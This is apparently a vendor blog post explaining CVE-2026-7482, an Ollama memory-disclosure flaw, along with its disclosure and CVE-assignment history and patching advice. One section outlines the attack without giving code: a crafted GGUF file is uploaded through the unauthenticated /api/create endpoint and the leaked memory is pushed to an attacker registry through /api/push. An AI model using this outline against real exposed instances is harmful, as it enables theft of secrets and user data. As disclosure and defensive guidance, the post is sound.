CVE-2026-7482: Critical Ollama memory vulnerability explained

Mor Weinberger
Mor Weinberger
May 05, 2026 | 8 Minutes
CVE-2026-7482: Critical Ollama memory vulnerability explained

Key takeaways

  • Cyera discovered and disclosed a critical vulnerability in Ollama, which Echo assigned and published in order to make it visible to the broader security ecosystem
  • The Ollama vulnerability allows unauthenticated attackers to extract sensitive data directly from memory
  • The issue affects every version prior to v0.17.1 and requires immediate patching
  • Around 300,000 internet-facing instances are potentially exposed due to common deployment practices
  • The fix was released without clearly communicating that it was a security issue

Earlier this year, researchers at Cyera uncovered a critical vulnerability in Ollama, one of the most widely used open-source tools for running large language models.

They followed the responsible disclosure process closely:

  • The issue was reported
  • The vendor eventually acknowledged it
  • A fix was developed and validated

On paper, it looked like a success: a serious vulnerability identified and patched within a reasonable timeframe. But what happened next is where things started to break down.

Once the fix shipped, there was a clear disconnect between what had happened behind the scenes and what users could actually see. The release notes focused on new features and performance improvements, without a security issue, advisory, or CVE attached to the release.

So, if you were running Ollama, there was nothing that made this update stand out. No signal that this was urgent or any indication that failing to upgrade could leave your system exposed.

So while the vulnerability had technically been fixed, in practice it remained very much alive.

What is CVE-2026-7482?

CVE-2026-7482 is a memory disclosure vulnerability rooted in how Ollama handles GGUF model files.

The server trusts the tensor dimensions provided inside these files without enforcing proper bounds checking, which means a specially crafted model can manipulate how memory is read during processing – causing the system to pull data from beyond its allocated buffers.

What gets exposed can include environment variables, API keys, system prompts, and even fragments of other users’ interactions. Because this data is folded into the output artifact, it can be quietly extracted without triggering errors or crashes.

This is what makes the vulnerability particularly dangerous. It doesn’t interrupt the system, it just quietly turns it into a data leak.

How the ollama vulnerability attack works

From an attacker’s perspective, the barrier to entry is low. They upload a malicious GGUF file using the /api/create endpoint. When Ollama processes it, the manipulated tensor dimensions cause the server to read unintended areas of memory. That data becomes part of the generated model artifact. From there, the attacker uses the /api/push endpoint to send the artifact to a registry they control, effectively exfiltrating whatever sensitive data was captured.

Neither endpoint requires authentication.

So, in environments where Ollama is exposed, which is more common than it should be, this can be executed remotely without credentials and without obvious indicators that anything is wrong.

Why the ollama vulnerability is especially risky

It assumes a local environment, but often isn’t

Ollama was designed as a localhost tool, which is why it doesn’t include authentication.

And while that assumption might hold in a controlled development setup, it rarely holds in production. In practice, teams deploy Ollama in containers, expose it to other services, or configure it to listen on all interfaces to support multi-client use. In many cases, this is even encouraged in documentation.

The result? A large number of instances are running with a zero-auth API, accessible from the network. So, what started as a local tool becomes an internet-facing service, without any of the protections that would normally be expected in that context. And at scale, that’s how teams wind up with hundreds of thousands of exposed instances.

The fix didn’t look urgent

The vulnerability was fixed relatively quickly after Cyera reported it, but the release that included the fix didn’t frame it as a security update. Instead, it simply highlighted new capabilities and improvements.

There was no indication that a critical issue had been addressed, and no CVE to reinforce the severity. So, for most teams, it didn’t rise to the top of the backlog.

Updates get prioritized based on perceived risk, and in this case, that signal wasn’t there. So the fixed vulnerability continued to pose a real risk in production environments – without teams even knowing.

Without a CVE, it’s effectively invisible

After the fix was released, Cyera submitted a CVE request through MITRE, which sat unresolved for months.

During that time, the vulnerability didn’t appear in scanning tools or vulnerability feeds. Security teams relying on automated detection had no way to identify affected systems or understand their exposure.

This highlights a core dependency in modern security workflows: without a CVE, a vulnerability is difficult to track, prioritize, or even notice. The delay didn’t just slow down documentation – it actually delayed real-world response.

Where Echo stepped in

At that point, Cyera turned to Echo, a registered CNA, to move the process forward.

Echo’s team performed its own technical validation against the fix and assigned CVE-2026-7482. It also ensured that the original request to MITRE was withdrawn to avoid duplicate records and unnecessary noise in the ecosystem.

The Echo team then published a complete CVE record with detailed context, including the full disclosure timeline, affected components, scoring, and practical guidance for users. That level of detail matters because it turns a fairly vague risk into something teams can actually understand and act on.

And, more importantly, it made the vulnerability visible.

Once the CVE was published, scanners could detect it, platforms could surface it, and organizations could finally effectively respond.

What this incident reveals about security today

This security incident surfaces a few patterns that are becoming harder to ignore.

  1. AI infrastructure is being deployed in ways that don’t match its original security assumptions. Tools built for local use are increasingly exposed in production environments, often without additional safeguards.
  2. The vulnerability ecosystem still has critical bottlenecks. Even when researchers and vendors move quickly, delays in CVE assignment can create real gaps in visibility
  3. Communication plays a bigger role than most teams expect. If a fix doesn’t clearly communicate risk, it often doesn’t get prioritized – regardless of how severe the underlying issue is.

What you should do if you’re using Ollama

If you’re running Ollama, start by upgrading to version 0.17.1 or later to eliminate the underlying vulnerability. Then take a closer look at how your instance is exposed. If it’s reachable from the public internet, restrict access using network controls or place it behind a secured proxy. Reducing exposure is just as important as patching.

If your instance was publicly accessible, it’s also worth assuming that sensitive data may have been exposed, so rotating credentials, reviewing logs, and auditing outputs can help lower the risk of lingering impact.

FAQs

What is CVE-2026-7482?

CVE-2026-7482 is a critical memory disclosure vulnerability in Ollama that allows attackers to read sensitive data from system memory. It occurs because the server trusts attacker-controlled input without properly validating it, which can lead to unintended data exposure during normal processing.

Who discovered CVE-2026-7482?

The vulnerability was discovered by researchers at Cyera, who followed a responsible disclosure process. They worked with the vendor to validate the issue and confirm that the fix addressed the root cause before moving forward with broader publication.

What did Echo do about CVE-2026-7482?

Echo acted as the CVE Numbering Authority (CNA) and assigned CVE-2026-7482 after delays in the traditional process. It also published a detailed CVE record, making the vulnerability visible to security tools and enabling organizations to detect and respond to it.

Which versions are affected?

All versions of Ollama prior to 0.17.1 are affected by this vulnerability. Any system running an earlier version should be considered at risk and updated as soon as possible.

Does this require authentication?

No, the vulnerability can be exploited without authentication if the Ollama instance is exposed to the network. This significantly increases the risk, as attackers do not need prior access or credentials to carry out the attack.

Why wasn’t this caught earlier?

Although the vulnerability was reported and fixed, it wasn’t clearly communicated as a security issue in the release notes. In addition, delays in CVE assignment meant it didn’t appear in vulnerability feeds or scanning tools for an extended period.

What should I do?

You should upgrade to the latest version of Ollama immediately to address the vulnerability. It’s also important to restrict network exposure and rotate any sensitive credentials that may have been exposed if your instance was publicly accessible.

What are the 7 blind spots in your vulnerability scans?

Discover when "0 vulnerabilities" doesn't actually mean you're clean.

Read now →

Ready to eliminate vulnerabilities at the source?